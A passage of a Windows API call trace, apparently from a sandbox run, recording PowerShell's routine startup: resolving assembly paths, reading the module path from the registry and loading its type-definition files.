	[0129.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.153] GetLastError () returned 0x7a
	[0129.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.433] GetLastError () returned 0x7a
	[0129.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.433] GetLastError () returned 0x7a
	[0129.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.433] GetLastError () returned 0x7a
	[0129.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.434] GetLastError () returned 0x7a
	[0129.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.434] GetLastError () returned 0x7a
	[0129.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.434] GetLastError () returned 0x7a
	[0129.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e228, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.434] GetLastError () returned 0x7a
	[0129.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.434] GetLastError () returned 0x7a
	[0129.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.435] GetLastError () returned 0x7a
	[0129.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0129.435] GetLastError () returned 0x7a
	[0130.267] SetConsoleCtrlHandler (HandlerRoutine=0x292384a, Add=1) returned 1
	[0130.267] GetLastError () returned 0x7a
	[0131.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.216] GetLastError () returned 0xcb
	[0131.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1e4
	[0131.941] GetLastError () returned 0x0
	[0132.079] CoCreateGuid (in: pguid=0x14e708 | out: pguid=0x14e708*(Data1=0xd931f374, Data2=0x9339, Data3=0x4ce8, Data4=([0]=0x89, [1]=0x53, [2]=0x16, [3]=0x90, [4]=0x66, [5]=0x91, [6]=0xc1, [7]=0x34))) returned 0x0
	[0134.553] WinSqmIsOptedIn () returned 0x0
	[0134.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.554] GetLastError () returned 0xcb
	[0134.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.707] GetLastError () returned 0xcb
	[0134.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.707] GetLastError () returned 0xcb
	[0134.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.710] GetLastError () returned 0xcb
	[0134.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.711] GetLastError () returned 0xcb
	[0134.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.727] GetLastError () returned 0xcb
	[0134.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.728] GetLastError () returned 0xcb
	[0134.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.728] GetLastError () returned 0xcb
	[0134.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0134.737] GetLastError () returned 0xcb
	[0135.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.255] GetLastError () returned 0xcb
	[0135.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.259] GetLastError () returned 0xcb
	[0135.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0135.260] GetLastError () returned 0xcb
	[0145.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.204] GetLastError () returned 0xcb
	[0145.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.204] GetLastError () returned 0xcb
	[0145.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.204] GetLastError () returned 0xcb
	[0145.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.204] GetLastError () returned 0xcb
	[0145.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.937] GetLastError () returned 0x3
	[0145.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.937] GetLastError () returned 0x3
	[0145.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.937] GetLastError () returned 0x3
	[0145.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.937] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.938] GetLastError () returned 0x3
	[0145.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.939] GetLastError () returned 0x3
	[0146.025] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0146.025] GetLastError () returned 0x3
	[0146.333] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x721bd8, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.333] GetLastError () returned 0x3
	[0146.333] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e520 | out: phkResult=0x14e520*=0x1ec) returned 0x0
	[0146.334] RegQueryValueExW (in: hKey=0x1ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e564, lpData=0x0, lpcbData=0x14e560*=0x0 | out: lpType=0x14e564*=0x2, lpData=0x0, lpcbData=0x14e560*=0x6c) returned 0x0
	[0146.442] RegQueryValueExW (in: hKey=0x1ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e564, lpData=0x721bd8, lpcbData=0x14e560*=0x6c | out: lpType=0x14e564*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14e560*=0x6c) returned 0x0
	[0146.442] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x721bd8, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0146.442] GetLastError () returned 0x3
	[0146.442] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x721bd8, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.442] GetLastError () returned 0x3
	[0146.443] RegCloseKey (hKey=0x1ec) returned 0x0
	[0146.443] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x721bd8, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0146.443] GetLastError () returned 0x3
	[0146.443] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e520 | out: phkResult=0x14e520*=0x1ec) returned 0x0
	[0146.443] RegQueryValueExW (in: hKey=0x1ec, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e564, lpData=0x0, lpcbData=0x14e560*=0x0 | out: lpType=0x14e564*=0x0, lpData=0x0, lpcbData=0x14e560*=0x0) returned 0x2
	[0146.444] RegCloseKey (hKey=0x1ec) returned 0x0
	[0146.737] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x721bd8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0146.739] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14e088, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0146.739] GetLastError () returned 0x3f0
	[0146.740] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0146.740] GetLastError () returned 0x3f0
	[0146.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.995] GetLastError () returned 0xcb
	[0146.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.998] GetLastError () returned 0xcb
	[0147.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.307] GetLastError () returned 0xcb
	[0147.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.307] GetLastError () returned 0xcb
	[0147.315] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e4a0 | out: phkResult=0x14e4a0*=0x34c) returned 0x0
	[0147.437] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e508, lpData=0x0, lpcbData=0x14e504*=0x0 | out: lpType=0x14e508*=0x1, lpData=0x0, lpcbData=0x14e504*=0x74) returned 0x0
	[0147.438] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e4e8, lpData=0x0, lpcbData=0x14e4e4*=0x0 | out: lpType=0x14e4e8*=0x1, lpData=0x0, lpcbData=0x14e4e4*=0x74) returned 0x0
	[0147.438] RegQueryValueExW (in: hKey=0x34c, lpValueName="path", lpReserved=0x0, lpType=0x14e4e8, lpData=0x721bd8, lpcbData=0x14e4e4*=0x74 | out: lpType=0x14e4e8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14e4e4*=0x74) returned 0x0
	[0147.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0147.438] GetLastError () returned 0xcb
	[0147.438] SetErrorMode (uMode=0x1) returned 0x1
	[0147.439] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14e4e8 | out: lpFileInformation=0x14e4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0147.439] GetLastError () returned 0xcb
	[0147.439] SetErrorMode (uMode=0x1) returned 0x1
	[0147.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0147.443] GetLastError () returned 0xcb
	[0147.443] SetErrorMode (uMode=0x1) returned 0x1
	[0147.443] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4dc | out: lpFileInformation=0x14e4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0147.443] GetLastError () returned 0xcb
	[0147.443] SetErrorMode (uMode=0x1) returned 0x1
	[0147.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0147.446] GetLastError () returned 0xcb
	[0147.446] SetErrorMode (uMode=0x1) returned 0x1
	[0147.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e4dc | out: lpFileInformation=0x14e4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0147.447] GetLastError () returned 0xcb
	[0147.447] SetErrorMode (uMode=0x1) returned 0x1
	[0147.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.740] GetLastError () returned 0xcb
	[0147.743] GetACP () returned 0x4e4
	[0148.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14deec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0148.149] GetLastError () returned 0xcb
	[0148.149] SetErrorMode (uMode=0x1) returned 0x1
	[0148.152] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350
	[0148.152] GetLastError () returned 0x0
	[0148.153] GetFileType (hFile=0x350) returned 0x1
	[0148.153] SetErrorMode (uMode=0x1) returned 0x1
	[0148.153] GetFileType (hFile=0x350) returned 0x1
	[0148.156] ReadFile (in: hFile=0x350, lpBuffer=0x2afb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afb494*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0148.156] GetLastError () returned 0x0
	[0148.157] ReadFile (in: hFile=0x350, lpBuffer=0x2afb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afb494*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0148.157] GetLastError () returned 0x0
	[0148.158] ReadFile (in: hFile=0x350, lpBuffer=0x2afb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afb494*, lpNumberOfBytesRead=0x14e454*=0x1000, lpOverlapped=0x0) returned 1
	[0148.158] GetLastError () returned 0x0
	[0148.158] ReadFile (in: hFile=0x350, lpBuffer=0x2afb494, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afb494*, lpNumberOfBytesRead=0x14e454*=0xcf3, lpOverlapped=0x0) returned 1
	[0148.159] GetLastError () returned 0x0
	[0148.159] ReadFile (in: hFile=0x350, lpBuffer=0x2afa927, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14e454, lpOverlapped=0x0 | out: lpBuffer=0x2afa927*, lpNumberOfBytesRead=0x14e454*=0x0, lpOverlapped=0x0) returned 1
	[0148.159] GetLastError () returned 0x0
